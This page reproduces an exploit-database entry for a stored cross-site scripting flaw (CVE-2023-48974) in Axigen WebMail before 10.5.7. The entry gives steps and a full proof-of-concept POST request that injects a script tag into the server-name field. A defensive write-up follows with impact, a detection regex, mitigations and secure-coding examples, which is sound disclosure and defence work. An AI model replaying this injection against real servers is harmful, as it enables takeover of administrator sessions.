Axigen < 10.5.7 - Persistent Cross-Site Scripting

Exploit Author: Vincent McRae, Mesut Cetin Analysis Author: www.bubbleslearn.ir Category: WebApps Language: JavaScript Published Date: 2024-04-02 
# Exploit Title: Axigen < 10.5.7 - Persistent Cross-Site Scripting
# Date: 2023-09-25
# Exploit Author: Vinnie McRae - RedTeamer IT Security
# Vendor Homepage: https://www.axigen.com/
# Software Link: https://www.axigen.com/mail-server/download/
# Version: (10.5.7) and older version of Axigen WebMail
# Tested on: firefox, chrome
# CVE: CVE-2023-48974

Description

The `serverName_input` parameter is vulnerable to stored cross-site
scripting (XSS) due to unsanitized or unfiltered processing. This means
that an attacker can inject malicious code into this parameter, which will
then be executed by other users when they view the page where the parameter
is used. This is affecting authenticated administrators, and the attack can
be used to attack other administrators with more permissions.

Exploitation

1. Login as administrator
2. Navigate to "global settings"
3. Change server name to <script>alert(1)</script>

PoC of the POST request:

```
POST /?_h=1bb40e85937506a7186a125bd8c5d7ef&page=gl_set HTTP/1.1
Host: localhost:9443
Cookie: eula=true;
WMSessionObject=%7B%22accountFilter%22%3A%22%22%2C%22currentDomainName%22%3A%22axigen%22%2C%22currentPrincipal%22%3A%22nada%22%2C%22domainFilter%22%3A%22%22%2C%22folderRecipientFilter%22%3A%22%22%2C%22groupFilter%22%3A%22%22%2C%22helpContainer%22%3A%22opened%22%2C%22leftMenu%22%3A%5B%22rights%22%2C%22services%22%2C%22clustering%22%2C%22domains%22%2C%22logging%22%2C%22backup%22%2C%22security%22%5D%2C%22mlistFilter%22%3A%22%22%2C%22premiumFilter%22%3A%22%22%2C%22sslCertificateFilter%22%3A%22%22%7D;
webadminIsModified=false; webadminIsUpdated=true; webadminIsSaved=true;
public_language=en; _hadmin=6a8ed241fe53d1b28f090146e4c65f52;
menuLeftTopPosition=-754
Content-Type: multipart/form-data;
boundary=---------------------------41639384187581032291088896642
Content-Length: 12401
Connection: close

-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="serverName_input"

<script>alert(1)</script>
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="primary_domain_input"

axigen
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="ssl_random_file_input"

--SNIP--

-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="update"

Save Configuration
-----------------------------41639384187581032291088896642--
```



#______________________________
#Vinnie McRae
#RedTeamer IT Security
#Blog: redteamer.de/blog-beitrag/


Axigen < 10.5.7 — Persistent Cross‑Site Scripting (CVE‑2023‑48974)

This article explains the persistent cross‑site scripting (XSS) vulnerability identified in Axigen WebMail prior to version 10.5.7 (CVE‑2023‑48974). It covers technical details, risk and impact, detection and hunting techniques, remediation and hardening guidance, and example fixes and mitigations for web application teams and defenders.

Executive summary

A stored (persistent) XSS flaw exists in the Axigen WebMail administrative interface where the serverName_input parameter is accepted and later rendered into administrative pages without sufficient output encoding or filtering. An authenticated attacker with access to the administration UI can inject JavaScript that will execute in the browsers of other administrators who view the affected page. This vulnerability is tracked as CVE‑2023‑48974 and was fixed in Axigen 10.5.7.

Why this matters

  • Stored XSS in an administrative interface is high severity: it allows the injection of arbitrary JavaScript that executes in the context of highly privileged users.
  • Exploitation can lead to session theft, privilege escalation, account takeover, configuration manipulation, persistence, or arbitrary actions performed by administrators.
  • Because the payload is persisted on the server, multiple administrators can be affected over time without repeated attacker interaction.

Technical details

Vulnerable flow (high level)

  • An authenticated administrator navigates to Global Settings (or another configuration page) through the WebMail admin UI.
  • The UI accepts the value for serverName_input and stores it in the configuration backend without properly encoding it for HTML output.
  • When an administrator (or any user with access to the admin page that renders this value) later views the page, the stored value is rendered raw into the response and any embedded script runs in the victim browser.

Example of a minimal payload

<script>alert(1)</script>

This payload is the classical proof‑of‑concept demonstrating execution. In a real attack, more dangerous payloads could steal cookies, exfiltrate admin credentials, or pivot further into the infrastructure.

Impact and attack scenarios

  • Account/session theft: stealing cookies or auth tokens of the administrator via DOM exfiltration.
  • Privilege escalation and lateral movement: use admin sessions to change server configuration, add accounts, or enable insecure services.
  • Stealthy persistence: implanting tracking/backdoor scripts that execute whenever admins visit the management console.
  • Supply chain/infrastructure compromise: using admin access to alter mail routing, certificates, or add malicious content to many users.

Detection and hunting

Indicator of compromise (IoC) and scanning signatures

  • Look for unusual values in the server configuration that contain HTML tags or JavaScript: e.g., entries where serverName_input contains <script> or on* attributes.
  • Web logs: POST requests to administration pages (e.g., page=gl_set) with multipart/form-data that include suspicious content in serverName_input.
  • Search for stored payloads in configuration backups, exported settings, or the application's database/filesystem.

Simple regex to find obvious stored payloads

(?i)serverName_input=.*%3Cscript%3E|serverName_input=.*<script>

This is a simple grep/regex to find URL or log entries that contain an encoded or raw script tag. Tune and sanitize before relying on it in production.

Active scanning

  • Use authenticated scanners or manual testing as an admin to verify whether inputs are persisted and rendered back without encoding.
  • Verify outputs in different contexts (HTML body, attributes, attribute values, and JavaScript contexts).

Mitigation and remediation

Immediate mitigation (if you cannot upgrade immediately)

  • Restrict access to the administrative UI: only allow trusted IPs and VPN access.
  • Enforce strong authentication for admin accounts (MFA) and rotate admin credentials immediately if you suspect compromise.
  • Harden HTTP response headers: add a strict Content Security Policy (CSP), set HttpOnly and Secure on cookies, and consider SameSite attributes.
  • Audit and sanitize existing serverName and other configuration values to remove injected scripts.

Permanent remediation

  • Upgrade Axigen to version 10.5.7 or later. The vendor patch addresses the stored XSS in the administrative UI.
  • Ensure the product implements context‑aware output encoding (e.g., HTML entity encoding before rendering into HTML).
  • Sanitize user input at the server level and apply allowlists for configuration fields where applicable (e.g., hostnames should match a DNS/hostname regex).
  • Adopt secure development practices: use OWASP guidance and automated security testing for UI inputs.

Secure coding examples

1) Principle — Output encoding vs. input filtering

For XSS prevention, rely on context‑aware output encoding. Input validation (allowlists) reduces risk but should not replace proper output encoding.

2) Example: Java server using OWASP Java Encoder (recommended)

// Java (server-side) — use OWASP Java Encoder
import org.owasp.encoder.Encode;

String safeServerName = Encode.forHtml(serverNameInput);
out.print("<div>" + safeServerName + "</div>");

Explanation: Encode.forHtml converts special characters to HTML entities (e.g., &lt; becomes &amp;lt;), preventing injected markup or scripts from executing when the value is placed into HTML content.

3) Example: PHP using native escaping

// PHP (server-side)
$serverName = $_POST['serverName_input'] ?? '';
// Validate: allow only acceptable characters for server names
if (!preg_match('/^[A-Za-z0-9.-]{1,255}$/', $serverName)) {
    $serverName = '';
}
echo '<div>' . htmlspecialchars($serverName, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</div>';

Explanation: This example first applies a simple allowlist regex for hostnames then uses htmlspecialchars to encode any remaining special characters when outputting to HTML. Adjust the validation rule to the accepted format for your field.

4) Example: Content Security Policy (CSP) header

// Example HTTP header (set on web server)
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self';

Explanation: A strict CSP reduces impact by blocking inline scripts and scripts from untrusted origins. Note that CSP is a defense-in-depth control and should not replace proper encoding.

Testing and validation

  • After patching or applying fixes, re‑test by attempting to store benign payloads (e.g., <script>alert(1)</script>) and verify they are displayed encoded, not executed.
  • Use multiple browsers and consider automated XSS scanners that support authenticated sessions.
  • Review server logs and configuration backups for any historical injected content and purge/clean as needed.

Timeline and references

  • Vendor: Axigen — https://www.axigen.com/
  • CVE: CVE‑2023‑48974 (stored XSS in WebMail administrative UI prior to 10.5.7).
  • Disclosure date (public advisory/PoC): September 25, 2023 (original researcher: Vinnie McRae / RedTeamer IT Security).

Guidance for defenders and incident responders

  • Assume compromise if unescaped script tags or suspicious configuration values are found. Rotate credentials and review admin actions.
  • Collect memory, session, and web access logs for any signs of token theft or unusual admin activity around the time of injection.
  • Search for evidence of secondary payloads (e.g., beaconing JavaScript to external domains).
  • Enforce least privilege for administration accounts and monitor admin sign‑ins with anomaly detection.

Conclusion

Stored XSS in an administrative interface is particularly dangerous because it targets highly privileged users and can enable far‑reaching attacks. The proper course of action is to upgrade Axigen to the patched version (10.5.7 or later), validate and sanitize configuration values, enforce access restrictions to admin consoles, and implement output encoding and CSP as additional layers of defense. Regular security testing and monitoring will help detect and mitigate similar issues early.